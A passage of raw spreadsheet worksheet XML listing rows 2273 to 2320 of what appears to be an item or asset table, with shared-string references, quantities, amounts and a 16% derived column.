      </c>
      <c r="J2273" s="15">
        <v>379.3248</v>
      </c>
      <c r="K2273" s="16"/>
    </row>
    <row r="2274" spans="2:11">
      <c r="B2274" s="9">
        <v>2308</v>
      </c>
      <c r="C2274" s="238" t="s">
        <v>10986</v>
      </c>
      <c r="D2274" s="238" t="s">
        <v>10987</v>
      </c>
      <c r="E2274" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2274" s="238" t="s">
        <v>10988</v>
      </c>
      <c r="G2274" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2274" s="10">
        <v>20</v>
      </c>
      <c r="I2274" s="14">
        <v>1541.75</v>
      </c>
      <c r="J2274" s="15">
        <v>246.688</v>
      </c>
      <c r="K2274" s="16"/>
    </row>
    <row r="2275" spans="2:11">
      <c r="B2275" s="9">
        <v>2309</v>
      </c>
      <c r="C2275" s="238" t="s">
        <v>10989</v>
      </c>
      <c r="D2275" s="238" t="s">
        <v>10990</v>
      </c>
      <c r="E2275" s="238" t="s">
        <v>10991</v>
      </c>
      <c r="F2275" s="238" t="s">
        <v>10992</v>
      </c>
      <c r="G2275" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2275" s="10">
        <v>1</v>
      </c>
      <c r="I2275" s="14">
        <v>3543.08</v>
      </c>
      <c r="J2275" s="15">
        <v>566.8928</v>
      </c>
      <c r="K2275" s="16"/>
    </row>
    <row r="2276" spans="2:11">
      <c r="B2276" s="9">
        <v>2310</v>
      </c>
      <c r="C2276" s="238" t="s">
        <v>10993</v>
      </c>
      <c r="D2276" s="238" t="s">
        <v>10994</v>
      </c>
      <c r="E2276" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2276" s="238" t="s">
        <v>10995</v>
      </c>
      <c r="G2276" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2276" s="10">
        <v>2</v>
      </c>
      <c r="I2276" s="14">
        <v>93.64</v>
      </c>
      <c r="J2276" s="15">
        <v>14.9824</v>
      </c>
      <c r="K2276" s="16"/>
    </row>
    <row r="2277" spans="2:11">
      <c r="B2277" s="9">
        <v>2311</v>
      </c>
      <c r="C2277" s="238" t="s">
        <v>10996</v>
      </c>
      <c r="D2277" s="238" t="s">
        <v>10997</v>
      </c>
      <c r="E2277" s="238" t="s">
        <v>10998</v>
      </c>
      <c r="F2277" s="238" t="s">
        <v>10999</v>
      </c>
      <c r="G2277" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2277" s="10">
        <v>9</v>
      </c>
      <c r="I2277" s="14">
        <v>4624.7</v>
      </c>
      <c r="J2277" s="15">
        <v>739.9584</v>
      </c>
      <c r="K2277" s="16"/>
    </row>
    <row r="2278" spans="2:11">
      <c r="B2278" s="9">
        <v>2312</v>
      </c>
      <c r="C2278" s="238" t="s">
        <v>11000</v>
      </c>
      <c r="D2278" s="238" t="s">
        <v>11001</v>
      </c>
      <c r="E2278" s="238" t="s">
        <v>11002</v>
      </c>
      <c r="F2278" s="238" t="s">
        <v>11003</v>
      </c>
      <c r="G2278" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2278" s="10">
        <v>4</v>
      </c>
      <c r="I2278" s="14">
        <v>688.03</v>
      </c>
      <c r="J2278" s="15">
        <v>110.0864</v>
      </c>
      <c r="K2278" s="16"/>
    </row>
    <row r="2279" spans="2:11">
      <c r="B2279" s="9">
        <v>2313</v>
      </c>
      <c r="C2279" s="238" t="s">
        <v>11004</v>
      </c>
      <c r="D2279" s="238" t="s">
        <v>11005</v>
      </c>
      <c r="E2279" s="238" t="s">
        <v>11006</v>
      </c>
      <c r="F2279" s="238" t="s">
        <v>11007</v>
      </c>
      <c r="G2279" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2279" s="10">
        <v>1</v>
      </c>
      <c r="I2279" s="14">
        <v>2564.14</v>
      </c>
      <c r="J2279" s="15">
        <v>410.2624</v>
      </c>
      <c r="K2279" s="16"/>
    </row>
    <row r="2280" spans="2:11">
      <c r="B2280" s="9">
        <v>2314</v>
      </c>
      <c r="C2280" s="238" t="s">
        <v>11008</v>
      </c>
      <c r="D2280" s="238" t="s">
        <v>11009</v>
      </c>
      <c r="E2280" s="238" t="s">
        <v>11006</v>
      </c>
      <c r="F2280" s="238" t="s">
        <v>11010</v>
      </c>
      <c r="G2280" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2280" s="10">
        <v>4</v>
      </c>
      <c r="I2280" s="14">
        <v>10256.42</v>
      </c>
      <c r="J2280" s="15">
        <v>1641.0304</v>
      </c>
      <c r="K2280" s="16"/>
    </row>
    <row r="2281" spans="2:11">
      <c r="B2281" s="9">
        <v>2315</v>
      </c>
      <c r="C2281" s="238" t="s">
        <v>11011</v>
      </c>
      <c r="D2281" s="238" t="s">
        <v>11012</v>
      </c>
      <c r="E2281" s="238" t="s">
        <v>11006</v>
      </c>
      <c r="F2281" s="238" t="s">
        <v>11013</v>
      </c>
      <c r="G2281" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2281" s="10">
        <v>4</v>
      </c>
      <c r="I2281" s="14">
        <v>5128.21</v>
      </c>
      <c r="J2281" s="15">
        <v>820.512</v>
      </c>
      <c r="K2281" s="16"/>
    </row>
    <row r="2282" spans="2:11">
      <c r="B2282" s="9">
        <v>2316</v>
      </c>
      <c r="C2282" s="238" t="s">
        <v>11014</v>
      </c>
      <c r="D2282" s="238" t="s">
        <v>11015</v>
      </c>
      <c r="E2282" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2282" s="238" t="s">
        <v>11016</v>
      </c>
      <c r="G2282" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2282" s="10">
        <v>3</v>
      </c>
      <c r="I2282" s="14">
        <v>2123.08</v>
      </c>
      <c r="J2282" s="15">
        <v>339.6912</v>
      </c>
      <c r="K2282" s="16"/>
    </row>
    <row r="2283" spans="2:11">
      <c r="B2283" s="9">
        <v>2317</v>
      </c>
      <c r="C2283" s="238" t="s">
        <v>11017</v>
      </c>
      <c r="D2283" s="238" t="s">
        <v>11018</v>
      </c>
      <c r="E2283" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2283" s="238" t="s">
        <v>11019</v>
      </c>
      <c r="G2283" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2283" s="10">
        <v>7</v>
      </c>
      <c r="I2283" s="14">
        <v>1242.98</v>
      </c>
      <c r="J2283" s="15">
        <v>198.8784</v>
      </c>
      <c r="K2283" s="16"/>
    </row>
    <row r="2284" spans="2:11">
      <c r="B2284" s="9">
        <v>2318</v>
      </c>
      <c r="C2284" s="238" t="s">
        <v>11020</v>
      </c>
      <c r="D2284" s="238" t="s">
        <v>11021</v>
      </c>
      <c r="E2284" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2284" s="238" t="s">
        <v>11022</v>
      </c>
      <c r="G2284" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2284" s="10">
        <v>14</v>
      </c>
      <c r="I2284" s="14">
        <v>1275.16</v>
      </c>
      <c r="J2284" s="15">
        <v>204.0192</v>
      </c>
      <c r="K2284" s="16"/>
    </row>
    <row r="2285" spans="2:11">
      <c r="B2285" s="9">
        <v>2319</v>
      </c>
      <c r="C2285" s="238" t="s">
        <v>11023</v>
      </c>
      <c r="D2285" s="238" t="s">
        <v>11024</v>
      </c>
      <c r="E2285" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2285" s="238" t="s">
        <v>11025</v>
      </c>
      <c r="G2285" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2285" s="10">
        <v>78</v>
      </c>
      <c r="I2285" s="14">
        <v>5689.95</v>
      </c>
      <c r="J2285" s="15">
        <v>910.416</v>
      </c>
      <c r="K2285" s="16"/>
    </row>
    <row r="2286" spans="2:11">
      <c r="B2286" s="9">
        <v>2320</v>
      </c>
      <c r="C2286" s="238" t="s">
        <v>11026</v>
      </c>
      <c r="D2286" s="238" t="s">
        <v>11027</v>
      </c>
      <c r="E2286" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2286" s="238" t="s">
        <v>11028</v>
      </c>
      <c r="G2286" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2286" s="10">
        <v>122</v>
      </c>
      <c r="I2286" s="14">
        <v>7468.35</v>
      </c>
      <c r="J2286" s="15">
        <v>1195.0144</v>
      </c>
      <c r="K2286" s="16"/>
    </row>
    <row r="2287" spans="2:11">
      <c r="B2287" s="9">
        <v>2321</v>
      </c>
      <c r="C2287" s="238" t="s">
        <v>11029</v>
      </c>
      <c r="D2287" s="238" t="s">
        <v>11030</v>
      </c>
      <c r="E2287" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2287" s="238" t="s">
        <v>11031</v>
      </c>
      <c r="G2287" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2287" s="10">
        <v>1</v>
      </c>
      <c r="I2287" s="14">
        <v>287.9</v>
      </c>
      <c r="J2287" s="15">
        <v>46.064</v>
      </c>
      <c r="K2287" s="16"/>
    </row>
    <row r="2288" spans="2:11">
      <c r="B2288" s="9">
        <v>2322</v>
      </c>
      <c r="C2288" s="238" t="s">
        <v>11032</v>
      </c>
      <c r="D2288" s="238" t="s">
        <v>11033</v>
      </c>
      <c r="E2288" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2288" s="238" t="s">
        <v>11034</v>
      </c>
      <c r="G2288" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2288" s="10">
        <v>1</v>
      </c>
      <c r="I2288" s="14">
        <v>1104.8</v>
      </c>
      <c r="J2288" s="15">
        <v>176.768</v>
      </c>
      <c r="K2288" s="16"/>
    </row>
    <row r="2289" spans="2:11">
      <c r="B2289" s="9">
        <v>2323</v>
      </c>
      <c r="C2289" s="238" t="s">
        <v>11035</v>
      </c>
      <c r="D2289" s="238" t="s">
        <v>11036</v>
      </c>
      <c r="E2289" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2289" s="238" t="s">
        <v>11037</v>
      </c>
      <c r="G2289" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2289" s="10">
        <v>8</v>
      </c>
      <c r="I2289" s="14">
        <v>8815.84</v>
      </c>
      <c r="J2289" s="15">
        <v>1410.5344</v>
      </c>
      <c r="K2289" s="16"/>
    </row>
    <row r="2290" spans="2:11">
      <c r="B2290" s="9">
        <v>2324</v>
      </c>
      <c r="C2290" s="238" t="s">
        <v>11038</v>
      </c>
      <c r="D2290" s="238" t="s">
        <v>11039</v>
      </c>
      <c r="E2290" s="238" t="s">
        <v>11040</v>
      </c>
      <c r="F2290" s="238" t="s">
        <v>11041</v>
      </c>
      <c r="G2290" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2290" s="10">
        <v>1</v>
      </c>
      <c r="I2290" s="14">
        <v>15923.08</v>
      </c>
      <c r="J2290" s="15">
        <v>2547.6928</v>
      </c>
      <c r="K2290" s="16"/>
    </row>
    <row r="2291" spans="2:11">
      <c r="B2291" s="9">
        <v>2325</v>
      </c>
      <c r="C2291" s="238" t="s">
        <v>11042</v>
      </c>
      <c r="D2291" s="238" t="s">
        <v>11043</v>
      </c>
      <c r="E2291" s="238" t="s">
        <v>5333</v>
      </c>
      <c r="F2291" s="238" t="s">
        <v>11044</v>
      </c>
      <c r="G2291" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2291" s="10">
        <v>6</v>
      </c>
      <c r="I2291" s="14">
        <v>670.04</v>
      </c>
      <c r="J2291" s="15">
        <v>107.2032</v>
      </c>
      <c r="K2291" s="16"/>
    </row>
    <row r="2292" spans="2:11">
      <c r="B2292" s="9">
        <v>2326</v>
      </c>
      <c r="C2292" s="238" t="s">
        <v>11045</v>
      </c>
      <c r="D2292" s="238" t="s">
        <v>11046</v>
      </c>
      <c r="E2292" s="238" t="s">
        <v>11047</v>
      </c>
      <c r="F2292" s="238" t="s">
        <v>11041</v>
      </c>
      <c r="G2292" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2292" s="10">
        <v>500</v>
      </c>
      <c r="I2292" s="14">
        <v>854.7</v>
      </c>
      <c r="J2292" s="15">
        <v>136.8</v>
      </c>
      <c r="K2292" s="16"/>
    </row>
    <row r="2293" spans="2:11">
      <c r="B2293" s="9">
        <v>2327</v>
      </c>
      <c r="C2293" s="238" t="s">
        <v>11048</v>
      </c>
      <c r="D2293" s="238" t="s">
        <v>11049</v>
      </c>
      <c r="E2293" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2293" s="238" t="s">
        <v>7790</v>
      </c>
      <c r="G2293" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2293" s="10">
        <v>272</v>
      </c>
      <c r="I2293" s="14">
        <v>1376.77</v>
      </c>
      <c r="J2293" s="15">
        <v>220.2112</v>
      </c>
      <c r="K2293" s="16"/>
    </row>
    <row r="2294" spans="2:11">
      <c r="B2294" s="9">
        <v>2328</v>
      </c>
      <c r="C2294" s="238" t="s">
        <v>11050</v>
      </c>
      <c r="D2294" s="238" t="s">
        <v>11051</v>
      </c>
      <c r="E2294" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2294" s="238" t="s">
        <v>7793</v>
      </c>
      <c r="G2294" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2294" s="10">
        <v>4</v>
      </c>
      <c r="I2294" s="14">
        <v>18.9</v>
      </c>
      <c r="J2294" s="15">
        <v>3.0272</v>
      </c>
      <c r="K2294" s="16"/>
    </row>
    <row r="2295" spans="2:11">
      <c r="B2295" s="9">
        <v>2329</v>
      </c>
      <c r="C2295" s="238" t="s">
        <v>11052</v>
      </c>
      <c r="D2295" s="238" t="s">
        <v>11053</v>
      </c>
      <c r="E2295" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2295" s="238" t="s">
        <v>7883</v>
      </c>
      <c r="G2295" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2295" s="10">
        <v>62</v>
      </c>
      <c r="I2295" s="14">
        <v>305.12</v>
      </c>
      <c r="J2295" s="15">
        <v>48.8064</v>
      </c>
      <c r="K2295" s="16"/>
    </row>
    <row r="2296" spans="2:11">
      <c r="B2296" s="9">
        <v>2330</v>
      </c>
      <c r="C2296" s="238" t="s">
        <v>11054</v>
      </c>
      <c r="D2296" s="238" t="s">
        <v>11055</v>
      </c>
      <c r="E2296" s="238" t="s">
        <v>11056</v>
      </c>
      <c r="F2296" s="238" t="s">
        <v>11057</v>
      </c>
      <c r="G2296" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2296" s="10">
        <v>27</v>
      </c>
      <c r="I2296" s="14">
        <v>2042.68</v>
      </c>
      <c r="J2296" s="15">
        <v>326.808</v>
      </c>
      <c r="K2296" s="16"/>
    </row>
    <row r="2297" spans="2:11">
      <c r="B2297" s="9">
        <v>2331</v>
      </c>
      <c r="C2297" s="238" t="s">
        <v>11058</v>
      </c>
      <c r="D2297" s="238" t="s">
        <v>11059</v>
      </c>
      <c r="E2297" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2297" s="238" t="s">
        <v>11060</v>
      </c>
      <c r="G2297" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2297" s="10">
        <v>1</v>
      </c>
      <c r="I2297" s="14">
        <v>159.33</v>
      </c>
      <c r="J2297" s="15">
        <v>25.4928</v>
      </c>
      <c r="K2297" s="16"/>
    </row>
    <row r="2298" spans="2:11">
      <c r="B2298" s="9">
        <v>2332</v>
      </c>
      <c r="C2298" s="238" t="s">
        <v>11061</v>
      </c>
      <c r="D2298" s="238" t="s">
        <v>11062</v>
      </c>
      <c r="E2298" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2298" s="238" t="s">
        <v>7931</v>
      </c>
      <c r="G2298" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2298" s="10">
        <v>4</v>
      </c>
      <c r="I2298" s="14">
        <v>1343.7</v>
      </c>
      <c r="J2298" s="15">
        <v>214.9952</v>
      </c>
      <c r="K2298" s="16"/>
    </row>
    <row r="2299" spans="2:11">
      <c r="B2299" s="9">
        <v>2333</v>
      </c>
      <c r="C2299" s="238" t="s">
        <v>11063</v>
      </c>
      <c r="D2299" s="238" t="s">
        <v>11064</v>
      </c>
      <c r="E2299" s="238" t="s">
        <v>11065</v>
      </c>
      <c r="F2299" s="238" t="s">
        <v>11066</v>
      </c>
      <c r="G2299" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2299" s="10">
        <v>5</v>
      </c>
      <c r="I2299" s="14">
        <v>15380.76</v>
      </c>
      <c r="J2299" s="15">
        <v>2460.92</v>
      </c>
      <c r="K2299" s="16"/>
    </row>
    <row r="2300" spans="2:11">
      <c r="B2300" s="9">
        <v>2334</v>
      </c>
      <c r="C2300" s="238" t="s">
        <v>11067</v>
      </c>
      <c r="D2300" s="238" t="s">
        <v>11068</v>
      </c>
      <c r="E2300" s="238" t="s">
        <v>11069</v>
      </c>
      <c r="F2300" s="238" t="s">
        <v>11070</v>
      </c>
      <c r="G2300" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2300" s="10">
        <v>4</v>
      </c>
      <c r="I2300" s="14">
        <v>140.17</v>
      </c>
      <c r="J2300" s="15">
        <v>22.4256</v>
      </c>
      <c r="K2300" s="16"/>
    </row>
    <row r="2301" spans="2:11">
      <c r="B2301" s="9">
        <v>2335</v>
      </c>
      <c r="C2301" s="238" t="s">
        <v>11071</v>
      </c>
      <c r="D2301" s="238" t="s">
        <v>11072</v>
      </c>
      <c r="E2301" s="238" t="s">
        <v>11073</v>
      </c>
      <c r="F2301" s="238" t="s">
        <v>11074</v>
      </c>
      <c r="G2301" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2301" s="10">
        <v>2</v>
      </c>
      <c r="I2301" s="14">
        <v>105</v>
      </c>
      <c r="J2301" s="15">
        <v>16.8</v>
      </c>
      <c r="K2301" s="16"/>
    </row>
    <row r="2302" spans="2:11">
      <c r="B2302" s="9">
        <v>2336</v>
      </c>
      <c r="C2302" s="238" t="s">
        <v>11075</v>
      </c>
      <c r="D2302" s="238" t="s">
        <v>11076</v>
      </c>
      <c r="E2302" s="238" t="s">
        <v>11077</v>
      </c>
      <c r="F2302" s="238" t="s">
        <v>11078</v>
      </c>
      <c r="G2302" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2302" s="10">
        <v>39</v>
      </c>
      <c r="I2302" s="14">
        <v>1432.31</v>
      </c>
      <c r="J2302" s="15">
        <v>229.1952</v>
      </c>
      <c r="K2302" s="16"/>
    </row>
    <row r="2303" spans="2:11">
      <c r="B2303" s="9">
        <v>2337</v>
      </c>
      <c r="C2303" s="238" t="s">
        <v>11079</v>
      </c>
      <c r="D2303" s="238" t="s">
        <v>11080</v>
      </c>
      <c r="E2303" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F2303" s="238" t="s">
        <v>11081</v>
      </c>
      <c r="G2303" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2303" s="10">
        <v>5</v>
      </c>
      <c r="I2303" s="14">
        <v>188.5</v>
      </c>
      <c r="J2303" s="15">
        <v>30.16</v>
      </c>
      <c r="K2303" s="16"/>
    </row>
    <row r="2304" spans="2:11">
      <c r="B2304" s="9">
        <v>2338</v>
      </c>
      <c r="C2304" s="238" t="s">
        <v>11082</v>
      </c>
      <c r="D2304" s="238" t="s">
        <v>11083</v>
      </c>
      <c r="E2304" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2304" s="238" t="s">
        <v>11084</v>
      </c>
      <c r="G2304" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2304" s="10">
        <v>37</v>
      </c>
      <c r="I2304" s="14">
        <v>6029.11</v>
      </c>
      <c r="J2304" s="15">
        <v>964.664</v>
      </c>
      <c r="K2304" s="16"/>
    </row>
    <row r="2305" spans="2:11">
      <c r="B2305" s="9">
        <v>2339</v>
      </c>
      <c r="C2305" s="238" t="s">
        <v>11085</v>
      </c>
      <c r="D2305" s="238" t="s">
        <v>11086</v>
      </c>
      <c r="E2305" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2305" s="238" t="s">
        <v>11087</v>
      </c>
      <c r="G2305" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2305" s="10">
        <v>2</v>
      </c>
      <c r="I2305" s="14">
        <v>396.8</v>
      </c>
      <c r="J2305" s="15">
        <v>158.72</v>
      </c>
      <c r="K2305" s="16"/>
    </row>
    <row r="2306" spans="2:11">
      <c r="B2306" s="9">
        <v>2340</v>
      </c>
      <c r="C2306" s="238" t="s">
        <v>11088</v>
      </c>
      <c r="D2306" s="238" t="s">
        <v>11089</v>
      </c>
      <c r="E2306" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2306" s="238" t="s">
        <v>7830</v>
      </c>
      <c r="G2306" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2306" s="10">
        <v>15</v>
      </c>
      <c r="I2306" s="14">
        <v>1025.64</v>
      </c>
      <c r="J2306" s="15">
        <v>410.28</v>
      </c>
      <c r="K2306" s="16"/>
    </row>
    <row r="2307" spans="2:11">
      <c r="B2307" s="9">
        <v>2341</v>
      </c>
      <c r="C2307" s="238" t="s">
        <v>11090</v>
      </c>
      <c r="D2307" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E2307" s="238" t="s">
        <v>11091</v>
      </c>
      <c r="F2307" s="238" t="s">
        <v>11092</v>
      </c>
      <c r="G2307" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2307" s="10">
        <v>40</v>
      </c>
      <c r="I2307" s="14">
        <v>3726.5</v>
      </c>
      <c r="J2307" s="15">
        <v>596.224</v>
      </c>
      <c r="K2307" s="16"/>
    </row>
    <row r="2308" spans="2:11">
      <c r="B2308" s="9">
        <v>2342</v>
      </c>
      <c r="C2308" s="238" t="s">
        <v>11093</v>
      </c>
      <c r="D2308" s="238" t="s">
        <v>11094</v>
      </c>
      <c r="E2308" s="238" t="s">
        <v>11094</v>
      </c>
      <c r="F2308" s="238" t="s">
        <v>11095</v>
      </c>
      <c r="G2308" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2308" s="10">
        <v>8</v>
      </c>
      <c r="I2308" s="14">
        <v>9487.17</v>
      </c>
      <c r="J2308" s="15">
        <v>1517.952</v>
      </c>
      <c r="K2308" s="16"/>
    </row>
    <row r="2309" spans="2:11">
      <c r="B2309" s="9">
        <v>2343</v>
      </c>
      <c r="C2309" s="238" t="s">
        <v>11096</v>
      </c>
      <c r="D2309" s="238" t="s">
        <v>11097</v>
      </c>
      <c r="E2309" s="238" t="s">
        <v>4758</v>
      </c>
      <c r="F2309" s="238" t="s">
        <v>11098</v>
      </c>
      <c r="G2309" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2309" s="10">
        <v>1</v>
      </c>
      <c r="I2309" s="14">
        <v>1995.22</v>
      </c>
      <c r="J2309" s="15">
        <v>319.2352</v>
      </c>
      <c r="K2309" s="16"/>
    </row>
    <row r="2310" spans="2:11">
      <c r="B2310" s="9">
        <v>2344</v>
      </c>
      <c r="C2310" s="238" t="s">
        <v>11099</v>
      </c>
      <c r="D2310" s="238" t="s">
        <v>11100</v>
      </c>
      <c r="E2310" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F2310" s="238" t="s">
        <v>11101</v>
      </c>
      <c r="G2310" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2310" s="10">
        <v>1</v>
      </c>
      <c r="I2310" s="14">
        <v>3135.9</v>
      </c>
      <c r="J2310" s="15">
        <v>501.744</v>
      </c>
      <c r="K2310" s="16"/>
    </row>
    <row r="2311" spans="2:11">
      <c r="B2311" s="9">
        <v>2345</v>
      </c>
      <c r="C2311" s="238" t="s">
        <v>11102</v>
      </c>
      <c r="D2311" s="238" t="s">
        <v>11103</v>
      </c>
      <c r="E2311" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2311" s="238" t="s">
        <v>11104</v>
      </c>
      <c r="G2311" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2311" s="10">
        <v>35</v>
      </c>
      <c r="I2311" s="14">
        <v>964.84</v>
      </c>
      <c r="J2311" s="15">
        <v>154.392</v>
      </c>
      <c r="K2311" s="16"/>
    </row>
    <row r="2312" spans="2:11">
      <c r="B2312" s="9">
        <v>2346</v>
      </c>
      <c r="C2312" s="238" t="s">
        <v>11105</v>
      </c>
      <c r="D2312" s="238" t="s">
        <v>11106</v>
      </c>
      <c r="E2312" s="238" t="s">
        <v>11107</v>
      </c>
      <c r="F2312" s="238" t="s">
        <v>11108</v>
      </c>
      <c r="G2312" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2312" s="10">
        <v>5</v>
      </c>
      <c r="I2312" s="14">
        <v>192.31</v>
      </c>
      <c r="J2312" s="15">
        <v>30.768</v>
      </c>
      <c r="K2312" s="16"/>
    </row>
    <row r="2313" spans="2:11">
      <c r="B2313" s="9">
        <v>2347</v>
      </c>
      <c r="C2313" s="238" t="s">
        <v>11109</v>
      </c>
      <c r="D2313" s="238" t="s">
        <v>11110</v>
      </c>
      <c r="E2313" s="238" t="s">
        <v>11111</v>
      </c>
      <c r="F2313" s="9"/>
      <c r="G2313" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2313" s="10">
        <v>1</v>
      </c>
      <c r="I2313" s="14">
        <v>5.19</v>
      </c>
      <c r="J2313" s="15">
        <v>0.8304</v>
      </c>
      <c r="K2313" s="16"/>
    </row>
    <row r="2314" spans="2:11">
      <c r="B2314" s="9">
        <v>2348</v>
      </c>
      <c r="C2314" s="238" t="s">
        <v>11112</v>
      </c>
      <c r="D2314" s="238" t="s">
        <v>8409</v>
      </c>
      <c r="E2314" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F2314" s="238" t="s">
        <v>11113</v>
      </c>
      <c r="G2314" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2314" s="10">
        <v>1</v>
      </c>
      <c r="I2314" s="14">
        <v>213.68</v>
      </c>
      <c r="J2314" s="15">
        <v>34.1888</v>
      </c>
      <c r="K2314" s="16"/>
    </row>
    <row r="2315" spans="2:11">
      <c r="B2315" s="9">
        <v>2349</v>
      </c>
      <c r="C2315" s="238" t="s">
        <v>11114</v>
      </c>
      <c r="D2315" s="238" t="s">
        <v>11115</v>
      </c>
      <c r="E2315" s="238" t="s">
        <v>11116</v>
      </c>
      <c r="F2315" s="238" t="s">
        <v>11117</v>
      </c>
      <c r="G2315" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2315" s="10">
        <v>9</v>
      </c>
      <c r="I2315" s="14">
        <v>6572.55</v>
      </c>
      <c r="J2315" s="15">
        <v>1051.6032</v>
      </c>
      <c r="K2315" s="16"/>
    </row>
    <row r="2316" spans="2:11">
      <c r="B2316" s="9">
        <v>2350</v>
      </c>
      <c r="C2316" s="238" t="s">
        <v>11118</v>
      </c>
      <c r="D2316" s="238" t="s">
        <v>11119</v>
      </c>
      <c r="E2316" s="238" t="s">
        <v>10929</v>
      </c>
      <c r="F2316" s="238" t="s">
        <v>11120</v>
      </c>
      <c r="G2316" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2316" s="10">
        <v>10</v>
      </c>
      <c r="I2316" s="14">
        <v>81.19</v>
      </c>
      <c r="J2316" s="15">
        <v>12.992</v>
      </c>
      <c r="K2316" s="16"/>
    </row>
    <row r="2317" spans="2:11">
      <c r="B2317" s="9">
        <v>2351</v>
      </c>
      <c r="C2317" s="238" t="s">
        <v>11121</v>
      </c>
      <c r="D2317" s="238" t="s">
        <v>11122</v>
      </c>
      <c r="E2317" s="238" t="s">
        <v>10933</v>
      </c>
      <c r="F2317" s="238" t="s">
        <v>11123</v>
      </c>
      <c r="G2317" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2317" s="10">
        <v>10</v>
      </c>
      <c r="I2317" s="14">
        <v>121.8</v>
      </c>
      <c r="J2317" s="15">
        <v>19.488</v>
      </c>
      <c r="K2317" s="16"/>
    </row>
    <row r="2318" spans="2:11">
      <c r="B2318" s="9">
        <v>2352</v>
      </c>
      <c r="C2318" s="238" t="s">
        <v>11124</v>
      </c>
      <c r="D2318" s="238" t="s">
        <v>11125</v>
      </c>
      <c r="E2318" s="238" t="s">
        <v>11126</v>
      </c>
      <c r="F2318" s="238" t="s">
        <v>3054</v>
      </c>
      <c r="G2318" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2318" s="10">
        <v>1</v>
      </c>
      <c r="I2318" s="14">
        <v>1529.91</v>
      </c>
      <c r="J2318" s="15">
        <v>244.7856</v>
      </c>
      <c r="K2318" s="16"/>
    </row>
    <row r="2319" spans="2:11">
      <c r="B2319" s="9">
        <v>2353</v>
      </c>
      <c r="C2319" s="238" t="s">
        <v>11127</v>
      </c>
      <c r="D2319" s="238" t="s">
        <v>4752</v>
      </c>
      <c r="E2319" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2319" s="238" t="s">
        <v>11128</v>
      </c>
      <c r="G2319" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2319" s="10">
        <v>30</v>
      </c>
      <c r="I2319" s="14">
        <v>7564.1</v>
      </c>
      <c r="J2319" s="15">
        <v>1210.272</v>
      </c>
      <c r="K2319" s="16"/>
    </row>
    <row r="2320" spans="2:11">
      <c r="B2320" s="9">
        <v>2354</v>
      </c>
      <c r="C2320" s="238" t="s">
        <v>11129</v>
      </c>
      <c r="D2320" s="238" t="s">
        <v>11130</v>
      </c>
      <c r="E2320" s="238" t="s">
        <v>11131</v>
      </c>
      <c r="F2320" s="238" t="s">
        <v>11132</v>
      </c>
      <c r="G2320" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2320" s="10">
        <v>19</v>
      </c>
